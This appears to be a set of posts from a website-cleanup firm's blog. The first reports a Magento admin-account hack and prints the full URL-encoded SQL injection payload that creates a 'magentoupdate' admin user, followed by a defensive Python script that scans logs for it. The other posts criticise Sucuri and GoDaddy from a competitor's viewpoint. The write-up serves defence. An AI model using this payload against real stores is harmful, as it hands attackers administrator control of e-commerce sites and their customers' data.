Hacker Using SQL Injection Vulnerability to Add “magentoupdate” Admin Account to Magento Websites

As is a common occurrence, we were recently hired to re-clean a hacked website that the security company Sucuri, which is owned by GoDaddy, had repeatedly failed to properly clean. This time it was a Magento based ecommerce website we were cleaning. As is standard issue in those situations, they had missed malicious code that should have been easy to find. What we also found was that the hacker had been able to add an additional admin account; unfortunately that had occurred before the period for which logging was still available, so we didn’t have evidence of how that had been done.

In a situation where we haven’t been able to determine how the hacker has gotten access, part of our cleanup process is to recheck things for a couple of weeks to see if the hacker tries to get back in. In this case the admin account returned a couple of days later.

For others dealing with this, the admin account in this situation had these details:

  • User Name: magentoupdate
  • Email: support@media.com
  • First Name: support
  • Last Name: support

With the logging available from when this occurred we found a log entry where one of the URL parameters was this:

');insert%20into%20%60admin_user%60%20(firstname,lastname,email,username,password,created,lognum,reload_acl_flag,is_active,extra,rp_token,rp_token_created_at)%20values%20('support','support','support@media.com','magentoupdate','8df1e8abd8ce4761633042eb8958db97:rp',NOW(),0,0,1,'N;',NULL,NOW());INSERT%20INTO%20%60admin_role%60%20(parent_id,tree_level,sort_order,role_type,user_id,role_name)%20VALUES%20(1,2,0,%22U%22,(SELECT%20user_id%20FROM%20admin_user%20WHERE%20username%20=%20'magentoupdate'),'support');

That is SQL code that creates the admin user and then assigns it an admin role, which would be executed through a SQL injection vulnerability. In this case it involved exploiting a SQL injection vulnerability in an extension on the website, which we then patched up.
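One way to spot this kind of attempt in the web server logs, as an added example that is not part of the original post: decode each request’s query string and flag any that contain SQL statements writing to Magento’s admin_user or admin_role tables. The log layout (Apache/nginx combined format) and the sample log lines are assumptions constructed for this example.

```python
"""
Detection helper (added example, not from the original post): scan web server
access log lines for URL-encoded SQL statements aimed at Magento's admin_user
and admin_role tables, which is how the "magentoupdate" account described
above was created. Sample log lines below are constructed for this example.
"""
import re
from urllib.parse import unquote_plus

# Apache/nginx "combined" log format. Assumption: the logs use this layout.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)

# Statements that have no business appearing in a URL parameter: writes to the
# Magento admin tables. Matching happens after decoding, so %20/%60 encoding
# and mixed case do not hide them.
SQLI_ADMIN_RE = re.compile(
    r"(insert\s+into|update|delete\s+from)\s+`?admin_(user|role)`?",
    re.IGNORECASE,
)
# Generic injection tell-tales: a quote closing a string followed by a
# statement separator, or a comment marker ending the statement.
SQLI_GENERIC_RE = re.compile(r"'\s*\)?\s*;|--\s*$|/\*", re.IGNORECASE)


def decode_query(path: str) -> str:
    """Return the fully URL-decoded query string, decoding repeatedly so that
    double-encoded payloads (%2527 -> %27 -> ') are also unwrapped."""
    query = path.split("?", 1)[1] if "?" in path else ""
    for _ in range(3):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query


def classify(line: str):
    """Return (severity, decoded_query) for one log line.
    severity is 'admin-sqli', 'sqli-suspect' or None (nothing found)."""
    m = LOG_RE.match(line)
    if not m:
        return None, ""
    q = decode_query(m.group("path"))
    if SQLI_ADMIN_RE.search(q):
        return "admin-sqli", q
    if SQLI_GENERIC_RE.search(q):
        return "sqli-suspect", q
    return None, q


def scan(lines):
    """Return a list of (severity, ip, decoded_query) for every flagged line."""
    hits = []
    for line in lines:
        sev, q = classify(line)
        if sev:
            hits.append((sev, LOG_RE.match(line).group("ip"), q))
    return hits


# Constructed sample lines: a normal catalog request, a request that tries to
# write to admin_user through a parameter (table name only, not the payload
# from the post), and one with only a generic quote-and-semicolon tell-tale.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2019:10:01:02 +0000] "GET /catalog/category/view/id/12?p=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Mar/2019:10:03:44 +0000] "GET /ext/search?q=%27%29%3Binsert%20into%20%60admin_user%60%20%28username%29%20values%20%28%27x%27%29 HTTP/1.1" 200 811',
    '198.51.100.7 - - [10/Mar/2019:10:03:50 +0000] "GET /ext/search?q=abc%27%29%3B%20select%201 HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for sev, ip, q in scan(SAMPLE_LOG):
        print(f"{sev:13} {ip:15} {q}")
```

A hit on admin_user or admin_role should be followed by checking that table directly for accounts you did not create, as the post did with the “magentoupdate” user.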

Sucuri’s 30 Day Refund Guarantee Scam Gets Worse

Back in May of last year someone contacting us about cleaning a hacked website mentioned that Sucuri had told them that they had 30 day refund guarantee, but when we went to look into that we found that in reality Sucuri didn’t provide refunds if someone had requested a cleanup, which is what that person had contacted them about having done.

Here is how the refund guarantee was advertised on their homepage at the time:

30-Day Guarantee

You have 30 days to request a refund according to our Terms of Service.

If you looked at the terms of service it turned out there was one exception for that refund guarantee, the aforementioned limit if you had requested a clean up to be done:

You will have thirty (30) days from the Service Commencement Date or any Renewal Commencement Date to cancel the Service (the “Cancellation Period”), in which case the Company will refund your Service Subscription Fee for the applicable Service Term provided that you have not submitted a Malware Removal Request during the Cancellation Period.

They could have spelled that out on the homepage in fewer words than it took to mention the terms of service, which seems like a good indication they are trying to hide it.

Since then the terms of service haven’t changed, but as we noticed when we went to look at something on their website recently, the marketing of the refund guarantee has gotten worse. For example at the top of the page about their website malware removals they write this:

Repair and restore hacked websites before it damages your reputation. We offer a 30-day money-back guarantee because we know we can help. You can rely on our dedicated incident response team, state-of-the-art technology, and excellent customer service.

If you actually try to get help though, they won’t provide you a refund, even if they didn’t do anything, since there is no refund once you request help.

Similarly, on the Immediate Help page, which has its own menu section at the top of all the website’s pages, the description of the second step in the process is:

We offer a 30-day money-back guarantee because we know we can help. After completing your billing information, you’ll get access to the Sucuri Dashboard.

Why Are Experienced Security Analysts Failing To Get Websites Clean?

If you look at the rest of the information on their website malware removal page, it seems like they are providing a good warning that something is amiss.

They claim that their cleanups are done by “experienced security analysts” and that “we aim to provide the best malware removal service”:

Experienced Security Analysts

Our dedicated researchers monitor active malware campaigns. With a trained team of analysts, we aim to provide the best malware removal service around.

They also claim that “[n]o hack is too complex for our incident response team”:

Automatic and Manual Cleanups

We use scripts and tools to quickly scan your website for malware. Our analysts check your site manually too. No hack is too complex for our incident response team.

That makes another section seem rather odd, since they highlight that they provide “unlimited cleanups”, which shouldn’t be needed if they were properly cleaning and securing websites (they actually do neither of those things properly):

Unlimited Cleanups

We love complex malware infections, and you’ll never pay more for them. Each plan covers your website for a year, including unlimited cleanups, pages, and databases.

Another claim that stands out is this:

Consider us an extension of your team. With professional security analysts available 24/7/365, you never have to worry about dealing with a hacked site.

In reality, what we have been hearing over and over from people coming to us after having used their service is that they can’t get in touch with anyone at Sucuri. That doesn’t seem to be an isolated issue, as numerous recent reviews of Sucuri on the website Trustpilot include the same complaint.

GoDaddy’s Idea of Security Involves Leaving Websites to Get Hacked

If it were not for seeing the great value we can provide in quickly resolving hacking situations that have gone on for weeks or months, we likely wouldn’t have anything to do with the security industry, since it is such an awful industry, which seems to be largely built around taking advantage of people. One recurring example of that is that those in the security industry promote leaving websites insecure as security, instead of telling people what would actually keep websites secure (which doesn’t involve the services they are selling). As yet another example of that, here is how GoDaddy sells people on a security service that they charge up to 29.99 a month for:

Complete protection for complete peace of mind.

Website Security powered by Sucuri is advanced protection made simple. There’s no software to install, daily security scans run automatically and if there’s ever an issue our auto removal tools can’t fix, our security experts will repair it manually – no matter how long it takes and at no additional cost to you.

By repairing the issue, they are talking about cleaning up a hack, which shouldn’t happen since the website is supposed to be protected.

Also of note, with the claims made in that quote, is that our experience from often being brought in to re-clean websites after their security division, Sucuri, fails to get the job done, is that sometimes they will keep doing incomplete cleanups and in other instances they won’t come back in and will falsely claim that a website is clean when it isn’t. In either case what they don’t do is attempt to properly clean up the websites in the first place, which would negate the need for even discussing repeated cleanups.

Paying a Lower Yearly Fee for an Ongoing Website Security Service When You Have a Hacked Website is Not a Deal

When people have had their website hacked, the unfortunate reality is that there are a lot of people out there looking to take advantage of them. A lot of that involves telling people what they want to hear while knowing that you are lying to them. Based on what people say when contacting us, what a lot of people with hacked websites are looking for is a service that will protect their website from being hacked again. The reality we tell them is that while there are plenty of services that claim to do that, they don’t work (as an example of that, we often have people coming to us asking if we offer a service like that which works, after using one that didn’t prevent their website from being hacked), and in fact the providers of them don’t even present any evidence that tries to support that they do. The additional reality is that the companies behind these services usually don’t even try to do the work that could possibly make them work.

That last element is in some ways the most important when it comes to someone that already has a hacked website, since part of the work that these services don’t do to try to protect websites is also an important part of cleaning up a hacked website. Just last Friday we mentioned an example of that with a company named Sucuri, which had press coverage for something that wasn’t meaningful when the real story should have been that they were publicly admitting to cutting corners with hack cleanups by not even trying to determine how the website got hacked. If you don’t know how websites are being hacked, you are going to have a hard time even trying to protect them. That they admitted to that isn’t really surprising to us because we have been dealing with the after effects of their improper cleanups and their failure to protect websites from being hacked in the first place for years.

Recently we had someone contact us while looking for a better deal on a website service after their web host GoDaddy tried to sell them on a $299 a year subscription for a service provided by Sucuri, which GoDaddy owns, after they claimed their website was hacked. Paying less for a service that won’t properly deal with a hack isn’t a better deal, since at any price it isn’t going to properly resolve the situation. Instead, if your website is hacked, what needs to be done is to get it properly cleaned up. Properly cleaning up a hacked website involves three key components:

  • Cleaning up the hack.
  • Getting the website as secure as possible (which usually involves getting any software on the website up to date).
  • Trying to determine how the website was hacked and fix that.

Once that has been done, then doing the security basics is what is going to do a better job than these services to keep your website from being hacked again.

If you want your hacked website properly cleaned up your best bet is to hire us. On the other hand, if you want to get ripped off, then check out the other companies out there, since a lot of them would love to take advantage of you.

Security Journalists Should Be Focused on Sucuri Failing to Properly Clean up Hacked Websites Instead of Non-Notable Malicious Code

When it comes to the poor state of web security, what is badly needed is security journalism that exposes what the many unscrupulous security companies are up to and how they take advantage of their customers. Instead, what we have found is that they act more as the marketing department for them.

One such security company that would apply to is Sucuri, which is a company that we are frequently brought in to re-clean hacked websites after, because they have not even attempted to properly clean them. One of the things we have often found that they haven’t done is try to determine how the website has been hacked. That is a problem for the cleanup, since you need to know how the website was hacked to ensure that the vulnerability has been fixed, and because we have often found that Sucuri is missing parts of the hack code that could have been spotted if they had done the work needed to try to determine how the website was hacked. But the larger issue with this company not doing that is that their main service is supposed to protect websites from being hacked in the first place, which, in all likelihood, is going to be difficult if you don’t know how they are being hacked.

Sucuri’s own marketing speaks to the fact that they don’t seem focused on actually protecting websites, as on their home page they tout a number of stats about the service, not one of which is related to the effectiveness of protecting websites:

The number of cleanups might be an indication of their failure to do that, if many of those are cleanups of existing customers’ websites (assuming the stats are even true).

You don’t have to take our word that Sucuri doesn’t try to determine how websites are hacked. A recent article on security news website Threatpost, Stealthy Malware Disguises Itself as a WordPress License Key, mentions that in passing, when it should be the focus of the story. Instead the focus of the story is in itself not newsworthy, as it reports on Sucuri describing a dime a dozen situation where malicious code has been added to the functions.php file of a WordPress theme. What might be newsworthy is how that code got there, but Sucuri didn’t even attempt to determine that:

“We had no access to their logs to determine the root cause, but it’s generally caused by compromised admin accounts or downloading and using themes/plugins from untrusted sources,” Moe Obaid, security analyst at Sucuri, told Threatpost.

Getting access to the logs would have been a basic part of the work of a proper cleanup and shouldn’t be difficult.

How this person would know how this type of hack generally happens if they are not doing the work to determine that seems like an obvious question to ask them, but it would appear that Threatpost wasn’t interested in digging deeper into an employee of this company admitting to cutting corners in the work they are doing. (You also have to wonder why someone is called a “security analyst” if they don’t actually do security analysis.) One explanation for the lack of critical coverage of the security industry by Threatpost, in this instance and in general, is that it appears to itself be owned by a security company.

When Sucuri Doesn’t Really Protect Your Website It Shouldn’t Be Surprising Their Cleanups Cause Problems As Well

We recently had someone contact us who was looking for a service that would protect their website from being hacked and clean up the website if it did get hacked. There is what seems to us to be an obvious issue with that, which is that cleaning up hacks wouldn’t be necessary if the website was being successfully protected from being hacked. It also seems like a bad idea to expect that if a company is providing a service where half of it doesn’t work, the other half will actually work well. When it comes to services that offer both of those things, our experience is that their providers usually are not just bad at both, but don’t even attempt to do the work that would be needed to do them properly.

As a case in point, we were contacted by someone last week that was using Sucuri’s service that provides both of those. The service failed to protect the website from getting infected with malware. Sucuri’s first cleanup failed to stop it from getting infected again (or didn’t fully clean it up), which is not at all surprising based on the many previous instances where we have been brought in to re-clean things after they failed to even attempt to do things properly.

After the second cleanup the website was broken. Once Sucuri fixed that issue, it was broken in another way, at which point the owner of the website contacted us.

There really isn’t any reason that anyone should be relying on Sucuri at this point (which was equally true years ago as well). They have shown they lack even a basic understanding of security, and their own marketing material indicates they are not focused on providing effective protection. They fail to properly deal with hacked websites even with the most serious hacking issues or high profile websites (we were recently hired to re-clean a hacked website they failed to clean, for which the hack was being investigated by the FBI).

GoDaddy Says That Version of PHP for Which Support Ended 3 Years Ago Meets Their Stability and Security Requirements

You would think that if a web host owned a security company they would be better than other web hosts when it comes to security. With GoDaddy that isn’t the case, though that might be explained by the fact that the security company they own, Sucuri, seems to be completely incompetent. As yet another example of the security issues with GoDaddy, while dealing with a support issue on a website hosted with them, we found that they were making this claim about PHP 5.4 on the Programming Languages page of their control panel for the website we were working on:

PHP version 5.4 is available and meets our stability and security requirements.

Support for PHP 5.4 ended in September of 2015.

To make things more confusing, if you click the question mark icon next to the radio selector for that version of PHP on the page, a message box appears that states:

Version 5.4 is no longer actively supported.

So is the first claim inaccurate or do they have really low standards for “stability and security”?

GoDaddy’s Idea of Securing Websites Actually Involves Leaving Them Insecure and Trying to Deal with the After Effects of That

Yesterday we discussed GoDaddy’s usage of misleading claims to try to sell overpriced SSL certificates. Based on that it probably wouldn’t be surprising to hear that they would mislead people in other ways about security, and that is exactly what we ran across while looking into things for that previous post. When we clicked on the “Add to Cart” button for one of their SSL certificates, at the bottom of the page we were taken to, there was a “malware scan and removal” service offered to “Secure your site”:

The description of that is:

Defend your site against hackers and malware with automatic daily scans and guaranteed cleanup.

It shouldn’t be too complicated to understand what is wrong with that, though as we mentioned earlier today there seems to be a lot of confusion when it comes to what security services and products do.

If a website is secure it wouldn’t have malware or some other hack on it to detect or remove, so either GoDaddy doesn’t understand what they are providing or they are lying about it.

The problem we see so often with this sort of service is that people will fail to do the things that will actually keep websites secure because they believe a service like this will actually keep a website secure.

Trying to deal with the after effects of having a website hacked instead of actually securing it introduces a lot of issues. One of those being that if a hacker uses the hack to exfiltrate customer data stored on the website a cleanup isn’t going to undo that.

What is a lot more important to note is that everything we have seen from the underlying provider of GoDaddy’s security services, Sucuri, is that they are not good at detecting and cleaning up hacks of websites. Their scanner seems, to put it politely, incredibly crude. Their employees seem to lack a basic capability to understand evidence that a website is hacked. And in what is most relevant to this specific service, we were recently brought in on a situation where their scanner had failed to detect that a website was hacked and then they repeatedly incompletely cleaned up the website, leaving it in a hacked state for a while. It was only after we were brought in to clean things up properly (which Sucuri doesn’t appear to even attempt to do) that it was finally cleaned and stayed that way.

Sucuri’s 30 Day Guarantee Guarantees That They Won’t Properly Clean Up Your Website

In our dealing with the continued poor state of web security, which seems to be a microcosm of the poor state of security in general, what we see is that there are many different pieces that all come together to get to the current situation. The really terrible shape of the security industry probably couldn’t exist without the public helping them out in numerous ways. One of those ways is that you have a lot of people that don’t really seem to be paying much attention before handing over money to unscrupulous security companies.

We recently had someone contact us looking for help with a hacked website. They hadn’t provided any details as to how they thought the website was hacked, and considering that many people come to us thinking a website has been hacked when it hasn’t, we first went to look at the website to see if we noticed any issues. We noticed one issue and then responded asking if that was what was at issue or if there was something more. They responded that they already were a paying customer and had sent several messages to support that they hoped we would address. Neither of those things sounded like us, especially since we charge after we have completed a cleanup, not before. It turned out that they had confused us with another company named Sucuri.

What was odder about that was that the person said they had seen Sucuri mentioned on our website and decided to give them a try. Considering that we have repeatedly written about problems caused by Sucuri, particularly involving hack cleanups, it doesn’t seem they could have been paying almost any attention to what we had written about that company.

That ties in to understanding something else that they mentioned, which is that Sucuri told them they provide a 30 day money back guarantee. They didn’t look into the details on that, which they should have.

We were curious to see what Sucuri’s refund policy actually was and found that they are inconsistent in what they are claiming to provide. More importantly, there are some huge caveats, so the guarantee would be of no value in a lot of cases.

On the homepage they advertise it this way:

30-Day Guarantee

You have 30 days to request a refund according to our Terms of Service.

Looking at the terms of service they first state:

You will have thirty (30) days from the Service Commencement Date or any Renewal Commencement Date to cancel the Service (the “Cancellation Period”), in which case the Company will refund your Service Subscription Fee for the applicable Service Term provided that you have not submitted a Malware Removal Request during the Cancellation Period.

Based on that if you sign up for their service and request a cleanup you can’t get a refund, so if they don’t properly clean things up (as they won’t) you are left paying for something that wasn’t done right.

In listing their various levels of service they make a big point of response time, so it seems pretty likely that they expect that many of their customers are coming to them looking for a cleanup:

So it seems like their refund offer would probably be immediately null for many of their customers. It also seems like if they were interested in being honest with their potential customers they would be upfront about that limitation, instead of burying that important limitation in a long legal document.

Later in the terms of service page they say something different:

If at any time during the Service Term, you submit a Malware Removal Request for a Covered Website that Company determines is infected, Company will use reasonable commercial efforts to clean the infected Covered Website. In the event that Company is unable, for any reason, to clean the infected Covered Website, Company will, as its sole and exclusive remedy, refund to you the annual fee you paid to the Company for the clean up of that Covered Website.

That would sound significant if we hadn’t seen what can actually happen when Sucuri is supposed to be dealing with a hacked website.

In April of last year we discussed a situation that we were brought in where Sucuri’s service had been purchased and they had claimed to have cleaned a website. When the original issue, credit cards being used on the website were being compromised, continued, the person running the website contacted Sucuri about that and Sucuri told them that the website was clean, despite it being very likely it wasn’t. This person wasn’t looking for a refund, just for them to clean things up, which considering Sucuri’s service is marketed as providing “Unlimited Malware & Hack Cleanup”, shouldn’t have been an issue. They instead had to hire us to get things properly cleaned up.

On Sucuri’s page about cancelling an account they have the following Refund section:

Refunds

Refunds are only available within 30 days of purchase and will only be issued in case a manual malware removal was not completed. On all other cases, you can cancel the account, but a refund will not be provided.

That doesn’t match what is written in the terms of service, so who knows what is going on there. But if that is to be believed, all they are actually offering is a refund if they don’t “complete” a manual malware removal. Considering that, based on everything we have seen, Sucuri doesn’t even really attempt to do complete cleanups, that doesn’t seem meaningful.

Right below that section is a Guarantee section:

Guarantee

We guarantee our work, so if your site gets reinfected we will clean it up again until it is 100% clean. But you also have to do your part and keep your sites updated, change passwords and follow our recommendations.

If you do not follow our recommendations, we will not clean it up again until they are done.

As a situation we were brought in to clean up after Sucuri in March shows, even when Sucuri is willing to clean things up again, it doesn’t mean the website is ever going to get fully cleaned, as the website in that situation was repeatedly incompletely cleaned up by Sucuri. What was happening is that Sucuri repeatedly removed parts of the hack, but since they didn’t remove the others, what they were removing just came back over and over.

One of the things that would have stopped that cycle would have been if Sucuri had done one of the three pieces of a proper cleanup, which is trying to determine how the website was hacked, as reviewing the logging as part of that would have identified where the remaining malicious code was.

Sucuri not only fails to do that piece of a proper cleanup, but they fail to do another one, which involves getting the website as secure as possible. That usually mainly consists of getting any software on the website up to date. Based on that guarantee language, they even try to push that off to the customer.

In fact while they sell their service as website security service, the guarantee seems to indicate they don’t do anything that will actually secure the website. What it looks like is that you are paying them an ongoing fee for them to be on call to improperly clean up your website.

If your website hasn’t been hacked you would be better off spending your time and money on doing the basics of security, as doing those things will greatly reduce the chances of the website being hacked. If your website has been hacked you would be better off hiring someone like us that will actually clean the website up properly and fully stands behind their work, instead of providing you with a misleading “guarantee”.

Does Sucuri Believe That There Are Unreal People Working At Other Website Security Companies?

Recently we have been taking a closer look at how website security services are marketed and how they provide what seem like they should be warning signs as to the reality that the services don’t actually provide real security. We ran into another example involving Sucuri, which also involves an odd tag line.

Here is an ad that showed up in search results while we were looking for some information for another recent post on this blog:

The tagline there is “Real People, Real Security”. The first part of that is odd, do they believe other website security companies employ unreal people? The second part of that though is more problematic, since Sucuri doesn’t provide real security. That is something that is hinted at by what else is mentioned in the ad. If they could provide real security then websites using their services wouldn’t be getting malware on them that needs to be cleaned, much less repeatedly, and yet one of the things they are touting in that ad is that they provide “Unlimited Malware Cleanup”.

As we noted recently, Sucuri doesn’t present evidence, much less evidence from independent testing, that their service is actually effective at protecting websites. So it would seem either they don’t know if they provide real security or they know they don’t provide real security, as we assume that if they were actually measuring or testing whether they provide real security they would tout the results if they were good.

There is plenty of reason to believe they don’t provide real security since as we also noted recently, it can be incredibly easy to bypass a critical piece of Sucuri’s offering, their website application firewall (WAF).

As we also noted recently, getting unlimited cleanups from Sucuri isn’t necessarily all that useful since we were recently brought in to deal with a website where Sucuri was repeatedly doing incomplete cleanups that didn’t resolve a hack.

It is also worth noting that while Sucuri has real people (again, who wouldn’t?), what is important is if they are competent, and what we have seen doesn’t point in that direction. For example, just about a year ago SiteLock was telling one of their customers that their website was clean when it seems to us that someone with basic competency in the field would have realized that wasn’t true, and the employee(s) failed to spot malicious code that we easily found on the website.